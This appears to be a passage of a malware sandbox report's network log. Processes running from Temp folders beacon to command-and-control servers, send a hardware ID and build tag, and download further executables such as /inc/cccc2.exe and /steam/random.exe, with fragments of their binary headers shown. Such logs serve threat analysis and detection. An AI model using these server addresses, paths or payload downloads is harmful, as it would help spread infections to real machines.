Sep 27, 2024 04:21:32.247173071 CEST	672	IN	Data Raw: 04 2a 00 1b 30 02 00 1b 00 00 00 1e 00 00 11 02 7b 4f 00 00 04 0a 06 1f fd 2e 04 06 17 33 0a 00 de 07 02 28 31 01 00 06 dc 2a 00 01 10 00 00 02 00 11 00 02 13 00 07 00 00 00 00 1b 30 04 00 f9 00 00 00 22 00 00 11 02 7b 4f 00 00 04 0b 07 2c 0b 07 Data Ascii: 0{O.3(10"{O,.c}O}T}Us7o}V}O+{Vo}W{U}P}O}O{RY}R{R-+H{U{TX{RX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49751	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:32.339709997 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:33.053108931 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:33.054280043 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:33.290419102 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49752	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:33.402616024 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:34.125428915 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:34.190855026 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:34.428586006 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49753	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:33.948923111 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 33 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000342001&unit=246122658369
Sep 27, 2024 04:21:34.673929930 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Sep 27, 2024 04:21:34.675781965 CEST	53	OUT	GET /inc/cccc2.exe HTTP/1.1 Host: 185.215.113.16
Sep 27, 2024 04:21:34.905131102 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:34 GMT Content-Type: application/octet-stream Content-Length: 367616 Last-Modified: Wed, 25 Sep 2024 17:02:23 GMT Connection: keep-alive ETag: "66f4421f-59c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b1 ea f3 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 92 05 00 00 08 00 00 00 00 00 00 3e b1 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 b0 05 00 53 00 00 00 00 c0 05 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 0c 00 00 00 b0 af 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf> @ `S H.textD `.rsrc@@.reloc@B H_dKSk+GQJnjIk)E&E8_b$(#?o8b9~V4v1uT0^.Lb;5H^1\|<`y54f~Y,S,WpS[6NkE^i&?on~!6AAJnxTHazcWng#u>A6KqcR9L;zs<j\|I:wH$z]MHChDy>olMA]~o\Z1D#KhyOvEMA9YAe8E2&
Sep 27, 2024 04:21:34.905147076 CEST	224	IN	Data Raw: 5f b2 e2 9d d3 f6 eb c2 dc 56 a3 48 16 49 ce c2 e7 44 23 b3 d5 f1 18 07 b8 80 23 4d f5 4c 71 c4 b5 4c 44 23 80 a3 7b 8a c2 54 e4 8e 38 dc 31 70 ed c2 7b 6d 1b 91 05 b2 97 b2 49 76 2f 3a 82 93 35 37 38 4b e0 91 9d d7 e2 a9 1d 71 01 a1 d6 21 82 63 Data Ascii: _VHID##MLqLD#{T81p{mIv/:578Kq!cWZU6)\|Auyfd=N6B>djAd{pWs[)@LYD5i?n,*2mm69zP:?y@GC70t+n
Sep 27, 2024 04:21:34.905158043 CEST	1236	IN	Data Raw: 1f aa 17 9d 81 9c a2 56 c2 8d 08 13 2d e1 3c 53 c2 a9 45 7c 70 95 aa 38 93 b8 00 9e d5 28 3f dd c8 1f fc b1 0b 19 e4 8b aa 77 8f 99 69 3b 40 46 6a cb b0 c3 e9 0c 8e 51 93 2c 08 e5 5a d0 8c 3f b6 2a 45 bf ba dd f9 42 97 2f 05 ae ec 10 83 43 99 26 Data Ascii: V-<SE\|p8(?wi;@FjQ,Z?*EB/C&=CSHd(.lF~Y2g!%.laBt{NTsWq~\|?t1B[0i6L8Y0-v:u
Sep 27, 2024 04:21:34.905199051 CEST	1236	IN	Data Raw: 0e fd 06 b2 cc e9 44 cf 96 73 ee 51 76 07 c3 05 e2 6d 87 65 fb bd 2f 0c 90 05 21 9e b8 f3 19 ad da 6d f0 fe 38 00 e7 e6 17 72 da d8 aa 62 41 c6 8c fd 74 68 34 cd 38 60 20 9e 94 92 f2 48 4d ba 26 8b 2e da 22 8f 78 de 4b b8 6c 00 f9 1a f6 82 bc bb Data Ascii: DsQvme/!m8rbAth48` HM&."xKlnR5A'%[TB/@dtI#rN%*\M'q/>[Ui-D\lI+hgk,^n-Y)eg9&7d`-UxEA
Sep 27, 2024 04:21:34.905210018 CEST	1236	IN	Data Raw: 28 c7 f7 9c 78 a3 9a 5d 79 18 52 6a 82 a9 6b d8 c6 ee 18 7d 62 92 d6 f5 0d 53 a4 79 2e 08 cf 9c 80 4a d9 b6 75 a0 21 49 4d 74 3f 80 25 98 0f 16 d9 a4 68 7b 90 94 d6 03 ba 97 8e 2a 63 fc 7b 0b 93 9c e5 1e b6 75 9c 94 49 c0 19 0b 99 f1 9d 29 43 08 Data Ascii: (x]yRjk}bSy.Ju!IMt?%h{c{uI)CMP$3zX;o/f&n9\|:%{Avt{0\F-]grBcX4U!`\|,Il8N\|UXz3E
Sep 27, 2024 04:21:34.905221939 CEST	272	IN	Data Raw: da f4 91 a0 5e 6f 5a 8c b4 7b ea e6 ff 5d ae 10 98 28 4a 28 55 5a a2 1a f0 c9 a0 cb 73 5b 03 ca 73 6f 7f 8a 19 68 c5 90 5c f5 0d 67 15 e8 1d 64 35 1e 49 fa aa 18 f0 30 0b e0 10 fc 63 13 03 a0 94 e4 fd a1 f0 42 64 c0 87 f8 da fa c5 42 d8 27 d0 f8 Data Ascii: ^oZ{](J(UZs[soh\gd5I0cBdB'.9;BkGL.-kc>C_SpS7Lke}QyG8U\|NjJoI(~VlCTka;!?wXdGo%i\|E\^U~ Bwt/>
Sep 27, 2024 04:21:34.905354977 CEST	1236	IN	Data Raw: 83 41 97 d3 20 50 25 2b f5 a0 6e 31 df 6e bb 09 75 da 65 cd eb b4 ee 48 f4 f9 e7 2f 55 75 e0 4b 33 23 30 68 57 82 29 9c c7 47 7e 66 4c d3 ae 72 75 fd 86 60 03 4b 05 47 31 b9 0a 48 4a a5 e8 60 08 b0 e4 89 3f 5b 55 b0 36 35 45 94 d4 0f 95 dc cf 9e Data Ascii: A P%+n1nueH/UuK3#0hW)G~fLru`KG1HJ`?[U65Ek"o>$1.3FT?*U95GG/_CI-/l,?ZUiM'{%+A`fuva"_2/D$'fDtWd\|_ky"WV8
Sep 27, 2024 04:21:34.905366898 CEST	1236	IN	Data Raw: 6d 76 17 e2 2a a9 8f a1 b3 65 46 a0 bf a6 2b d5 da 7d eb 07 a6 a9 5e e3 76 a0 0d 24 a1 44 55 00 0b 1b 55 99 35 69 21 67 0c 57 14 b7 3d 41 18 0e 76 93 a4 be a2 97 58 e0 4c 52 07 39 5d d7 8c df 0f 4f 99 59 46 98 39 de dd 30 2f 8e 84 8f fd 33 b5 73 Data Ascii: mv*eF+}^v$DUU5i!gW=AvXLR9]OYF90/3s4DR6u),dzqdun0_2mj>zdt]sf1rfXuhsFDRv%9<EDlLFX7Z KLVk\C{leb
Sep 27, 2024 04:21:34.905378103 CEST	1236	IN	Data Raw: 6b 21 a9 b1 5b 10 c8 d7 09 f3 06 be a2 99 c7 0f 47 3c 18 fa 2b 6b 77 d4 a8 e6 3b 14 81 25 f6 08 00 36 62 d2 88 41 34 90 19 9f 34 aa 80 0a 81 0f 9c 73 00 66 9e b5 4e 65 91 21 0e af 66 f2 7f 1f 66 25 73 e7 74 b0 07 a4 42 a8 7f f3 9a 1c 87 02 20 91 Data Ascii: k![G<+kw;%6bA44sfNe!ff%stB LVU(-t#lo_xS2$/x0boD$Ap>aO[I~P!7,Xw-A{ hx]&+$j+BbL3 vJ=zE)C\@%Vhq
Sep 27, 2024 04:21:34.905390024 CEST	672	IN	Data Raw: 56 12 6f a4 85 82 81 b4 15 19 2d 0e a5 3e ca b2 f5 a3 8b 96 30 29 61 6e 68 7f 61 9d 00 18 90 17 ee 32 bb 41 e2 2f a2 eb 57 d1 01 55 5b 62 8c ea 0d d0 ee 84 09 e7 83 47 df 74 65 52 9e ee ec 7c b1 2b 07 f5 80 a2 b1 c2 f5 f0 45 a7 ec b6 92 11 b9 aa Data Ascii: Vo->0)anha2A/WU[bGteR\|+EYlVgd{RY'zc~?NT%=!pWUaR%r&{Uvb=IAU_^]WY;fBeL"5?%`K?aw&uoXK.7H8
Sep 27, 2024 04:21:34.905802965 CEST	1236	IN	Data Raw: 34 b7 44 f4 2a ca 50 c6 8e ae 60 d5 1a 50 51 1d 00 ab db 63 e4 8b a5 67 2b fa 82 77 af cf a4 f3 39 fb 87 7c de fb 8e 91 7f ae cc c3 1a 3b cb 9f a0 d0 68 12 a6 3e e3 c5 54 82 0a 86 20 30 fa ee d4 6d 8e 16 67 66 f2 bd 9e 38 25 7f c7 f3 50 44 61 c8 Data Ascii: 4DP`PQcg+w9\|;h>T 0mgf8%PDaWH>6(R"5,RKS\|gk$\TkT^}>-c?]E\|=\|<wEc>ZhMEMaqD~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49754	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:34.585153103 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:35.297358990 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:35.317243099 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:35.552525043 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49755	91.202.233.158	80	2000	C:\Users\user\AppData\Local\Temp\svchost015.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:34.593863010 CEST	89	OUT	GET / HTTP/1.1 Host: 91.202.233.158 Connection: Keep-Alive Cache-Control: no-cache
Sep 27, 2024 04:21:35.293293953 CEST	203	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 04:21:35.321105957 CEST	415	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKJDHDBKEBGHJJJJKEHD Host: 91.202.233.158 Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 48 44 42 4b 45 42 47 48 4a 4a 4a 4a 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 39 45 32 46 37 32 32 41 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 48 44 42 4b 45 42 47 48 4a 4a 4a 4a 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 48 44 42 4b 45 42 47 48 4a 4a 4a 4a 4b 45 48 44 2d 2d 0d 0a Data Ascii: ------JKJDHDBKEBGHJJJJKEHDContent-Disposition: form-data; name="hwid"EF9E2F722A951117388365------JKJDHDBKEBGHJJJJKEHDContent-Disposition: form-data; name="build"default------JKJDHDBKEBGHJJJJKEHD--
Sep 27, 2024 04:21:35.722311020 CEST	210	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49756	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:35.668064117 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:36.380700111 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:36.387485981 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:36.728775024 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49757	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:36.306492090 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 33 34 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000349001&unit=246122658369
Sep 27, 2024 04:21:36.986148119 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49758	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:36.875870943 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:37.589122057 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:37.979578018 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:38.216197014 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49759	185.215.113.103	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:37.058609962 CEST	57	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.103
Sep 27, 2024 04:21:37.790895939 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:37 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 27 Sep 2024 01:43:45 GMT ETag: "1be200-6230ffc554407" Accept-Ranges: bytes Content-Length: 1827328 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2f ba f1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 60 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 69 00 00 04 00 00 76 d4 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$CXmYpy`\nRichPEL/f$`i@iv@P%d% %(@.rsrc %8@.idata %8@ )%:@niikbxzgO~<@nnynhmhkPi@.taggant0`i"@
Sep 27, 2024 04:21:37.791055918 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 27, 2024 04:21:37.791074038 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 27, 2024 04:21:37.791085005 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
